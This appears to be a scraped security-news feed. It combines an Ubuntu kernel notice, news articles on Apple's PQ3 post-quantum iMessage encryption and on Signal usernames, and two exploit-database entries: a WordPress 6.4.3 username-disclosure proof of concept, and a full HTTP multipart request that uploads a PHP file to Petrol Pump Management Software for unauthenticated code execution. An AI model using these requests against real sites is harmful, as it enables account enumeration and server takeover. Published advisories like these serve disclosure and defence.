linux-image-4.15.0-1165-aws     4.15.0-1165.178~16.04.1   linux-image-4.15.0-1174-azure   4.15.0-1174.189~16.04.1   linux-image-4.15.0-222-generic  4.15.0-222.233~16.04.1   linux-image-4.15.0-222-lowlatency  4.15.0-222.233~16.04.1   linux-image-aws-hwe             4.15.0.1165.148   linux-image-azure               4.15.0.1174.158   linux-image-gcp                 4.15.0.1159.149   linux-image-generic-hwe-16.04   4.15.0.222.6   linux-image-gke                 4.15.0.1159.149   linux-image-lowlatency-hwe-16.04  4.15.0.222.6   linux-image-oem                 4.15.0.222.6   linux-image-oracle              4.15.0.1128.109   linux-image-virtual-hwe-16.04   4.15.0.222.6After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6647-1   CVE-2023-51780, CVE-2023-51782, CVE-2023-7192

Ubuntu Security Notice USN-6647-1

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

Useful quantum computers aren’t a reality—yet. But in one of the biggest deployments of post-quantum encryption so far, Apple is bringing the technology to iMessage.

Apple is launching its first post-quantum protections, one of the biggest deployments of the future-resistant encryption technology to date.

Billions of medical records, financial transactions, and messages we send to each other are protected by encryption. It’s fundamental to keeping modern life and the global economy running relatively smoothly. However, the decades-long race to create vastly powerful quantum computers, which could easily crack current encryption, creates new risks.

While practical quantum computing technology may still be years or decades away, security officials, tech companies, and governments are ramping up their efforts to start using a new generation of post-quantum cryptography. These new encryption algorithms will, in short, protect our current systems against any potential quantum computing-based attacks.

Today Cupertino is announcing that PQ3—its post-quantum cryptographic protocol—will be included in iMessage. The update will launch in iOS and iPad OS 17.4 and macOS 14.4 after previously being deployed in the beta versions of the software. Apple, which published the news on its security research blog, says the change is the “most significant cryptographic security upgrade in iMessage history.”

“We rebuilt the iMessage cryptographic protocol from the ground up,” its blog post says, adding that the upgrade will fully replace its existing encryption protocols by the end of this year. You don’t need to do anything other than update your operating system for the new protections to be applied.

Quantum computing is serious business. Governments in the US, China, and Russia as well as tech companies such as Google, Amazon, and IBM are plowing billions into the (still) relatively nascent efforts to create quantum computers. If successful, the technologies could help unlock scientific breakthroughs in everything from drug design to creating longer-lasting batteries. Politicians are also vying to become quantum superpowers. The current quantum computing devices are still experimental and not practical for general use.

Unlike the computers we use today, quantum computers use qubits, which can exist in more than one state. (Current bits are either ones or zeroes). It means that quantum devices can store more information than traditional computers and perform more complex calculations, including potentially cracking encryption.

“Quantum computers, if deployed reliably and in a scalable manner, would have the potential to break most of today’s cryptography,” says Lukasz Olejnik, an independent cybersecurity and privacy researcher and consultant. This includes the encryption in the messaging apps that billions of people use every day. Most encrypted messaging apps using public key cryptography have used RSA, Elliptic Curve, or Diffie-Hellman algorithms.

Responding to the potential threat—which has been known about since the 1990s—intelligence and security agencies have become increasingly vocal about developing and deploying quantum-resistant cryptography. The National Institute of Standards and Technology in the US has been a driving force behind the creation of these new encryption types. Olejnik says tech companies are taking the quantum threat “very” seriously. “Much more serious than some older changes like switches between hash functions,” Olejnik says, adding that things are moving relatively fast given that post-quantum cryptography is still “very young” and there’s “no functional quantum computer on the horizon.”

Apple’s rollout of PQ3 in iMessage follows Signal in introducing post-quantum algorithms—the encrypted messaging app introduced its PQXDH specification in September, saying it is built on the Kyber algorithm. Proton, the creator of encrypted email and other apps, said around the same time that it is building quantum-safe PGP encryption for everyone to use.

In its blog post, Apple details how PQ3 has been built and how it operates. The company says PQ3 creates a new post-quantum encryption key as part of the public keys that phones and computers using iMessage create and transmit to Apple’s servers. The company is using the Kyber algorithm—the same approach as Signal—to do this and will generate the keys from the first message that is sent, even if the person receiving the message is offline.

Apple says its setup will apply its post-quantum protections to the creation of encryption keys and the exchange of messages, including if someone’s encryption key has been compromised by an attacker. “To best protect end-to-end encrypted messaging, the post-quantum keys need to change on an ongoing basis to place an upper bound on how much of a conversation can be exposed by any single, point-in-time key compromise—both now and with future quantum computers,” the company says in its blog post.

The post-quantum protections are an addition to its existing encryption, Apple says. It is using a “hybrid design” that combines its current elliptic curve cryptography (ECC) with the newer post-quantum protections. “Defeating PQ3 security requires defeating both the existing, classical ECC cryptography and the new post-quantum primitives,” Apple writes.

Apple says PQ3 has been externally assessed by a third-party security company, which it has not named, and also two groups of academics who have written papers analyzing the system. The company argues that its approach—as it is able to issue new quantum keys—has stronger protections than Signal’s current deployment. “We conclude that this protocol achieves strong security guarantees against an active network adversary who can selectively compromise parties and has quantum computing capabilities,” a research paper led by David Basin, a computer science professor at ETH Zurich, says of PQ3.

While there’s no guarantee that quantum technologies will ever develop enough to become useful, it’s likely that the next few years will see a steady drip of companies deploying and enhancing their post-quantum protocols. In part, this is to combat one of the biggest current fears around quantum computing: that countries and threat actors are gathering and hoarding encrypted data today with the plan to unlock its secrets if quantum technologies evolve.

Starting to deploy post-quantum encryption now—before functional quantum computers exist—has the potential to limit the impact of these so-called “harvest now, decrypt later” attacks. “We are seeing our adversaries do this—copying down our encrypted data and just holding on to it,” Dustin Moody, who leads post-quantum encryption standards in the US told _The New Yorker_ in 2022. “It’s definitely a real threat.”

Apple iOS 17.4: iMessage Gets Post-Quantum Encryption in New Update

We tested the end-to-end encrypted messenger’s new feature aimed at addressing critics’ most persistent complaint. Here’s how it works.

For nearly a decade, cybersecurity professionals and privacy advocates have recommended the end-to-end encrypted communications app Signal as the gold standard for truly private digital communications. Using it, however, has paradoxically required exposing one particular piece of private information to everyone you text or call: a phone number. Now, that's finally changing.

Today, Signal launched the rollout in beta of a long-awaited set of features it's describing simply as “phone number privacy.” Those features, which WIRED has tested, are designed to allow users to conceal their phone numbers as they communicate on the app and instead share a username as a less-sensitive method of connecting with one another. Rather than give your phone number to other Signal contacts as the identifier they use to begin a conversation with you, in other words, you can now choose to be discoverable via a chosen handle—or even to prevent anyone who does have your phone number from finding you on Signal.

You’ll now be able to set a unique username as a way for people to find you on Signal in addition to—or instead of—your phone number.

Courtesy of Signal

The use of phone numbers has long been perhaps the most persistent criticism of Signal's design. These new privacy protections finally offer a fix, says Meredith Whittaker, Signal's president. “We want to build a communications app that everyone in the world can easily use to connect with anyone else _privately_. That ‘privately’ is really in bold, underlined, in italics,” Whittaker tells WIRED. “So we're extremely sympathetic to people who might be using Signal in high-risk environments who say, 'The phone number is really sensitive information, and I don't feel comfortable having that disseminated broadly.'”

In the new features—which are available in beta now, but which Signal plans to roll out in a more final version in the coming weeks—Signal has made three changes, one setting that's now switched on by default and two that are opt-in features. First, by default, your phone number will no longer be visible in your Signal profile unless someone already has the number saved in their phone's address book. Second, you can now choose to create and share a unique username, or a QR code that contains it, with anyone you want to connect with. Mine, for instance, is Andy.01. (Once someone does start messaging you, a little confusingly, they'll see your chosen profile name instead of that username. That profile name, just as before in Signal, doesn't have to be unique, and the person you're interacting with can also change it in their own view of you in the app.)

New settings in Signal allow you to change both the visibility and discoverability of your phone number. Your number’s visibility will be turned off by default. Turning off its discoverability, a more drastic measure, will be left as an opt-in setting for higher risk users.

Courtesy of Signal

The third new feature, which is not enabled by default and which Signal recommends mainly for high-risk users, allows you to turn off not just your number's visibility but its discoverability. That means no one can find you in Signal unless they have your username, even if they already know your number or have it saved in their address book. That extra safeguard might be important if you don't want anyone to be able to tie your Signal profile to your phone number, but it will also make it significantly harder for people who know you to find you on Signal.

The new phone number protections should now make it possible to use Signal to communicate with untrusted people in ways that would have previously presented serious privacy risks. A reporter can now post a Signal username on a social media profile to allow sources to send encrypted tips, for instance, without also sharing a number that allows strangers to call their cell phone in the middle of the night. An activist can discreetly join an organizing group without broadcasting their personal number to people in the group they don't know.

In the past, using Signal without exposing a private number in either of those situations would have required setting up a new Signal number on a burner phone—a difficult privacy challenge for people in many countries that require identification to buy a SIM card—or with a service like Google Voice. Now you can simply set a username instead, which can be changed or deleted at any time. (Any conversations you've started with the old username will switch over to the new one.) To avoid storing even those usernames, Signal is also using a cryptographic function called a Ristretto hash, which allows it to instead store a list of unique strings of characters that encode those handles.

Amid these new features designed to calibrate exactly who can learn your phone number, however, one key role for that number hasn't changed: There's still no way to avoid sharing your phone number with Signal itself when you register. The fact that this requirement persists even after Signal's upgrade will no doubt rankle some critics who have pushed Signal's developers to better cater to users seeking more complete anonymity, such that even Signal's own staff can't see a phone number that might identify users or hand that number over to a surveillance agency wielding a court order.

Whittaker says that, for better or worse, a phone number remains a necessary requisite as the identifier Signal privately collects from its users. That's partly because it prevents spammers from creating endless accounts since phone numbers are scarce. Phone numbers are also what allow anyone to install Signal and have it immediately populate with contacts from their address book, a key element of its usability.

In fact, designing a system that prevents spam accounts and imports the user's address book _without_ requiring a phone number is “a deceptively hard problem,” says Whittaker. “Spam prevention and actually being able to connect with your social graph on a communications app—those are existential concerns,” she says. “That's the reason that you still need a phone number to register, because we still need a thing that does that work.”

The continued phone number requirement means Signal's privacy upgrade is a compromise, says Matthew Green, a professor of cryptography and computer science at Johns Hopkins University who has in the past consulted for both Google and Facebook in their implementation of Signal's open source encryption protocol. “It's a half solution,” says Green. “It's not a perfect solution.”

Green notes, however, that even if it doesn't satisfy the most die-hard privacy advocates, it represents a significant improvement for a much larger portion of Signal's hundreds of millions of users. “There’s a legitimate community of people who wanted to use Signal without giving other people their phone numbers, and they’re going to be very happy with this change. And then there's a more hardcore set of people who don’t want to ever give their number to Signal,” Green says. “I think getting a big set of people serviced is the right direction, and working on satisfying all the other people is something for Signal to keep working on.”

Signal doesn't currently have any road map toward dropping its use of phone numbers as a registration mechanism, Whittaker concedes—she says for now, there's no alternative that wouldn't sacrifice Signal's usability, which she argues would represent a net loss for privacy advocates. But she says that the new phone number privacy features are nonetheless Signal's careful attempt to solve the problem phone numbers represent without losing the qualities that have made Signal popular in the first place.

“It's really about staying true to our principles,” Whittaker says. “In more and more ways—in better and better ways—to fill that promise of easy, usable, private communications.”

_Correction: 2/20/24, 1:25 pm EST: Meredith Whittaker's professional title is president of the Signal Foundation._

Signal Finally Rolls Out Usernames, So You Can Keep Your Phone Number Private

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Tag

#google